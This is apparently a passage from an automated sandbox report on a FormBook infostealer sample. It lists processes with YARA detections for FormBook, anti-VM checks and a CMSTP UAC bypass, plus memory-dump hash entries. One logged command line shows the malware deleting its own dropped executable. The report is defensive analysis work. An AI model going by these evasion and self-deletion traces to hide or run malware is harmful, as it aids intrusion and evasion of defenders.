                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.487374826.0000000004C33000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000000.00000002.487280531.0000000004BA6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.487565258.0000000004C93000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.489825108.0000000004F1D000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Target ID:3
                                Start time:23:31:53
                                Start date:06/06/2022
                                Path:C:\Windows\SysWOW64\ByteCodeGenerator.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\ByteCodeGenerator.exe
                                Imagebase:0xda0000
                                File size:48128 bytes
                                MD5 hash:AFC144CF65A44040369561D0A7B808BC
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.471199219.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.470778539.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.567277416.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000000.470404681.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.568261585.00000000032D0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.568042051.0000000002DB0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                Target ID:4
                                Start time:23:31:57
                                Start date:06/06/2022
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff74fc70000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.533300024.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000000.513489612.0000000005B9A000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Target ID:12
                                Start time:23:32:34
                                Start date:06/06/2022
                                Path:C:\Windows\SysWOW64\explorer.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\explorer.exe
                                Imagebase:0xf50000
                                File size:3611360 bytes
                                MD5 hash:166AB1B9462E5C1D6D18EC5EC0B6A5F7
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.707469060.0000000003950000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.707690856.0000000003980000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000002.706770545.0000000003340000.00000040.80000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                Target ID:14
                                Start time:23:32:41
                                Start date:06/06/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Windows\SysWOW64\ByteCodeGenerator.exe"
                                Imagebase:0x7ff78ca80000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Target ID:15
                                Start time:23:32:42
                                Start date:06/06/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff77f440000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Reset < >
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D0Gm$D0Gm$D0Gm
                                  • API String ID: 0-2898852852
                                  • Opcode ID: 93c5ab4169d6c585b31a7fb34444bea56e769a6bbe12c171511b97e60c9e5bca
                                  • Instruction ID: a0891b3c7fede6d0fab5a3aeaf316eeffc8570e07746596eae02b4802e0bc994
                                  • Opcode Fuzzy Hash: 93c5ab4169d6c585b31a7fb34444bea56e769a6bbe12c171511b97e60c9e5bca
                                  • Instruction Fuzzy Hash: 1D125A70A002198FDB24DFA8C844BAEBBF6BF88344F148569E54ADB395DB34DD41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 8|Fm$fish
                                  • API String ID: 0-836746391
                                  • Opcode ID: 16ffa15968000c4a405af618c60ff724fd7998fe66fd678644c17598cec5d5b3
                                  • Instruction ID: 58147a4f5919ec22e34380302abf97a5a5aaf22fb3e84adbd76f5cfab333ee61
                                  • Opcode Fuzzy Hash: 16ffa15968000c4a405af618c60ff724fd7998fe66fd678644c17598cec5d5b3
                                  • Instruction Fuzzy Hash: CB91B170B043169FDB14DFA9D894AAEBBF6FF89304F448929D502DB251DB30AE05CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2264f8c65a9868fe429aff0dbe85615883f89e36495ed1fd39637a47d155a44a
                                  • Instruction ID: 57ea0944ee6a40a514e69c23fdabc77423d6699844f1a16868c827dd5d6de60a
                                  • Opcode Fuzzy Hash: 2264f8c65a9868fe429aff0dbe85615883f89e36495ed1fd39637a47d155a44a
                                  • Instruction Fuzzy Hash: 8242AC30A00259CFCB25CF69C484AAEBBF2BF49314F158569E959DB3A1C730EE41DB52
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: fb780ebb5bb8286409e783c380dcb05ddce646604ee396ce1f84aa72b329b385
                                  • Instruction ID: 731ee27d5a868f871b264d9fe48d37d2590bcbfab807839d4df77fc0437a6543
                                  • Opcode Fuzzy Hash: fb780ebb5bb8286409e783c380dcb05ddce646604ee396ce1f84aa72b329b385
                                  • Instruction Fuzzy Hash: F2025A31A00209DFDB25CFA9D884AADBBF6FF88304F158469E915EB261D730DE41DB61
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 92a16c824a57091b01eb39782c9a65957c05220a716418f8ac6d910fba538f99
                                  • Instruction ID: 5ef67af4d393b65621947b52785cb49556fa4e258f55faf691fd05646d2027b4
                                  • Opcode Fuzzy Hash: 92a16c824a57091b01eb39782c9a65957c05220a716418f8ac6d910fba538f99
                                  • Instruction Fuzzy Hash: 5BF1E131A006168FCB15CFA9C4809AEFBF2FF89300B15C5A9D545EB365D734EA45CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1ee037de630ed359fb93f58d168fe4b6287ee20f65555287feafd722d018712c
                                  • Instruction ID: 67d836f891ee5bc5ce929f62832094b20755bd1e07c3c68ddbc297a53c93fbc9
                                  • Opcode Fuzzy Hash: 1ee037de630ed359fb93f58d168fe4b6287ee20f65555287feafd722d018712c
                                  • Instruction Fuzzy Hash: 0CD13735A00209CFCB15CF64D48899DFBB2FF89305B1AC655E855AB361DB35EA86CF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 33bc5ab24cedd8b6d6f371d5dcf5260916801c11afa5c8af26ad20b392dc8e65
                                  • Instruction ID: afad25ec3e5fe45f0d0f0613c008902cbba1e201648a43478795730a1e9bf9fb
                                  • Opcode Fuzzy Hash: 33bc5ab24cedd8b6d6f371d5dcf5260916801c11afa5c8af26ad20b392dc8e65
                                  • Instruction Fuzzy Hash: 00B13735A00219CFCB15CF64D4C49AEFBB2FF88305B1AC655E815AB361D735E986CB90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XcGm$XcGm
                                  • API String ID: 0-3094550588
                                  • Opcode ID: 27cba7d33c8128065f893bcab5f98ac74792b031f195dcbf7118effdcc2b0884
                                  • Instruction ID: fef7aa7e6b26c87bc89eb2fb5d27e65e0ccc2c1136946b89b877cf4a3b4e5160
                                  • Opcode Fuzzy Hash: 27cba7d33c8128065f893bcab5f98ac74792b031f195dcbf7118effdcc2b0884
                                  • Instruction Fuzzy Hash: 09E1BE307002159FDB259BB8C858BBE7BAAAF88318F14892DE506CB795DB74CD42C791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XcGm$XcGm
                                  • API String ID: 0-3094550588
                                  • Opcode ID: 0d9e06c4ea322bbc911497793050504096893423a621eb68fdb297bde57f8515
                                  • Instruction ID: a55342e51b8aef33f2d54981f660062c166c48617c7fc6fc9e57b60a02f2135b
                                  • Opcode Fuzzy Hash: 0d9e06c4ea322bbc911497793050504096893423a621eb68fdb297bde57f8515
                                  • Instruction Fuzzy Hash: 28818E34A00205CFDB24CF6DC4889AABBB7FF89318B1581A9D516DB365D731EE41CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: xBm
                                  • API String ID: 0-2246868460
                                  • Opcode ID: 30c9972603e3b8ad2a975f4ffe0f875caebc6e26c7e94ea31c6f1271021c55b8
                                  • Instruction ID: af6b60db2cb83b42ee418920ecc4cf2f7b2ad151e43f11d5a7cfb964d2d01b26
                                  • Opcode Fuzzy Hash: 30c9972603e3b8ad2a975f4ffe0f875caebc6e26c7e94ea31c6f1271021c55b8
                                  • Instruction Fuzzy Hash: BBF197303149058FFB169A3CC9587397BAAEF85708F2944BAE542CF3A6EB25CE41C751
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: /Gm
                                  • API String ID: 0-2490745996
                                  • Opcode ID: 956a882e3ebc3fd9eb4841774b5832278dc4792aefb503b28a29e018415f5114
                                  • Instruction ID: 1ef490a1b03feb5e3a0004ecb2bca69e66bdc781a89e7f2bf2981db3aa127da0
                                  • Opcode Fuzzy Hash: 956a882e3ebc3fd9eb4841774b5832278dc4792aefb503b28a29e018415f5114
                                  • Instruction Fuzzy Hash: 4281B2317001158FDB2AAF79985867E7AEBAFC8344B14446DEA06CB394DF34CE02D791
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: T:Gm
                                  • API String ID: 0-3236750216
                                  • Opcode ID: 2a5fa13b4d97a21425c95a4bbf2c8472d80b586374ef9b5b3ebc88da1bcecf89
                                  • Instruction ID: bdca48fe0f95343ec36361ed8e3e4c32e42f5d830a31c84793099e81cdd54a2b
                                  • Opcode Fuzzy Hash: 2a5fa13b4d97a21425c95a4bbf2c8472d80b586374ef9b5b3ebc88da1bcecf89
                                  • Instruction Fuzzy Hash: 6E7167307442151BDB185778C86477F7AABABC6395F158129E20ACB3DACF75EE0283D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: U
                                  • API String ID: 0-3372436214
                                  • Opcode ID: d40f1c61c17fa8c0ba77c4ccc836f963bdf35748c2364367375a33102ec85245
                                  • Instruction ID: 60dde451ce00d98ecebc989abe435de5f35a171f20819301fa353332ba540ccc
                                  • Opcode Fuzzy Hash: d40f1c61c17fa8c0ba77c4ccc836f963bdf35748c2364367375a33102ec85245
                                  • Instruction Fuzzy Hash: 12512671A082498FC721CF29C8946AABFF6FF85304F1985AAE445DB252D735DA41CF90
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: T:Gm
                                  • API String ID: 0-3236750216
                                  • Opcode ID: 03543f363bb7c1a9a636effaea8296e74f54bad8587c2b314c1a73d9ffedfa59
                                  • Instruction ID: d25fe625d73a52f188b89aaf1bfa6c4e9562fc304a6bee23ec1f1351fa26faea
                                  • Opcode Fuzzy Hash: 03543f363bb7c1a9a636effaea8296e74f54bad8587c2b314c1a73d9ffedfa59
                                  • Instruction Fuzzy Hash: E741F830B442250BCB089778C06037F6A97BBC5395F1592799219CB7DACF75EE0283D2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: x5Gm
                                  • API String ID: 0-559199283
                                  • Opcode ID: 4af8c87682d317e1dd667c3d9388ea31b2ddd192171cc36e89fb64955c965ff8
                                  • Instruction ID: b8fcd52a36d0145a1851fe5ec59f4555aba34648068558389530461ab97761dd
                                  • Opcode Fuzzy Hash: 4af8c87682d317e1dd667c3d9388ea31b2ddd192171cc36e89fb64955c965ff8
                                  • Instruction Fuzzy Hash: 7331E8213086904FC7165B7C546C67D3FE9EF87249B4540EAE186CF3A7CA19CE09C762
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: /Gm
                                  • API String ID: 0-2490745996
                                  • Opcode ID: 12f342934d10f26bfcdd036a16ecb0078b7d7fbf665db5844181ed9236ae0c44
                                  • Instruction ID: 22e45a10b9148eda9da7e46e15ab397344beb92bdbe628c0164b7625d24d8e1d
                                  • Opcode Fuzzy Hash: 12f342934d10f26bfcdd036a16ecb0078b7d7fbf665db5844181ed9236ae0c44
                                  • Instruction Fuzzy Hash: 8B21F8367042114FE71A9B7CA858A7EBBA6EFC532472944BED606CB3A1DE31CD02C750
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: XcGm
                                  • API String ID: 0-3914811663
                                  • Opcode ID: df4a2f5763e93a070a89571cf232443360d30c2ea3882f2f6de4532d5c681472
                                  • Instruction ID: edffd987336cb2d2fa74b05c8ac8fc68f2285c439ef4205d916f197003039abb
                                  • Opcode Fuzzy Hash: df4a2f5763e93a070a89571cf232443360d30c2ea3882f2f6de4532d5c681472
                                  • Instruction Fuzzy Hash: 5B11D334B042548FC725CF28944CA797FB2EF85365F154169E809CB651EB70DE46CB91
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 1df32767bd311eb820909d352a9b5efaebb1e62dbb64e19b0e2c6419d17ef9de
                                  • Instruction ID: c62f093cd200037d9d3067d0b8cc7c2da1786e37311bd31548faea482672e5c6
                                  • Opcode Fuzzy Hash: 1df32767bd311eb820909d352a9b5efaebb1e62dbb64e19b0e2c6419d17ef9de
                                  • Instruction Fuzzy Hash: 89523F34A0021D8FEB25DBA4C854BEEB7B6FF84304F1084AAD14AAB794DB319E45DF51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e817152b447bc1d16dbcd718ad4dfb0f0d0ee44d930213bcead95f86c4e88541
                                  • Instruction ID: 8e16786c0825ccb6febb23ddede7bbe1d8f29ea8077f07d1cd0480c622866f8f
                                  • Opcode Fuzzy Hash: e817152b447bc1d16dbcd718ad4dfb0f0d0ee44d930213bcead95f86c4e88541
                                  • Instruction Fuzzy Hash: 09E11B75A00614CFCB15DFA8D8889ADBBF6BF89314F1684A9E515EB362C730ED41CB60
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.490398250.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5820000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b3598a12de04f971e1f3086fae3bc26baaf08848e5127cf0295edac0993e4fa1
                                  • Instruction ID: eeb0ecc9f5f4877ea49eaf754fe628d82b9215d3daea0211fa787765684d4c03
                                  • Opcode Fuzzy Hash: b3598a12de04f971e1f3086fae3bc26baaf08848e5127cf0295edac0993e4fa1
                                  • Instruction Fuzzy Hash: F5C16A39E00119DFCB10DFA4C984D9DBBB6FF49304F208156E516AB265DB31AD95EF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.490398250.0000000005820000.00000040.00000800.00020000.00000000.sdmp, Offset: 05820000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_5820000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 45508ff7bf75df04a6482247eb975d29ccd3f1f982f7c82a7157c31fe07ec15b
                                  • Instruction ID: 6cea008ae6bdce144a390e074e8bf0d149e258a8c46edffe68f0dcae3c818ac8
                                  • Opcode Fuzzy Hash: 45508ff7bf75df04a6482247eb975d29ccd3f1f982f7c82a7157c31fe07ec15b
                                  • Instruction Fuzzy Hash: 31C16938E00119DFCB10DFA4C984D9DBBB6FF49304F218156E616AB265DB31AD95EF80
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000000.00000002.480535535.0000000001870000.00000040.00000800.00020000.00000000.sdmp, Offset: 01870000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_1870000_SecuriteInfo.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b22acf0e69f1052bdb9a27df3c73c62d0cfa923b989da685dbc25686f5d4f398
                                  • Instruction ID: ab1fe700b5db99d671620b606729aeb234f4da10e0f7aba4fed1afbbfe389816
